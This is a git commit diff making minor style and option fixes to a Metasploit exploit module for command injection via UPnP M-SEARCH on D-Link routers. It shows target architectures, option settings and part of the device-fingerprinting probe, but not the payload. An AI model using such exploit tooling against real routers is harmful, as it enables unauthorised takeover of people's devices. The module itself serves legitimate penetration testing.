Do minor fixes

2014-07-11 09:17:34 -05:00 · 2014-07-11 09:17:34 -05:00 · 36c6e74221
parent 579ce0a858
commit 36c6e74221
1 changed files with 10 additions and 8 deletions
--- a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec_echo.rb
+++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec_echo.rb
@ -22,13 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote
      'Author'      =>
        [
          'Zachary Cutlip', # Vulnerability discovery and initial exploit
-          'Michael Messner <devnull@s3cur1ty.de>' # Metasploit module and verification on other routers
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
-          [ 'URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection' ], # original exploit
-          [ 'URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html' ] # original exploit
+          ['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
+          ['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
        ],
      'DisclosureDate' => 'Feb 01 2013',
      'Privileged'     => true,
@ -40,21 +40,23 @@ class Metasploit3 < Msf::Exploit::Remote
              'Arch'     => ARCH_MIPSLE
            }
          ],
-          [ 'MIPS Big Endian',  # unknown if there are big endian devices out there
+          [ 'MIPS Big Endian', # unknown if there are big endian devices out there
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_MIPS
            }
-          ],
+          ]
        ],
      'DefaultTarget'  => 0
      ))
+
    register_options(
      [
        Opt::RHOST(),
-        Opt::RPORT(1900),
+        Opt::RPORT(1900)
      ], self.class)

+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
@ -72,8 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote
    res = nil
    1.upto(5) do
      res,_,_ = udp_sock.recvfrom(65535, 1.0)
-      break if res and res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
-      udp_sock.sendto(msearch, rhost, rport, 0)
+      break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
+      udp_sock.sendto(pkt, rhost, rport, 0)
    end

    # UPnP response: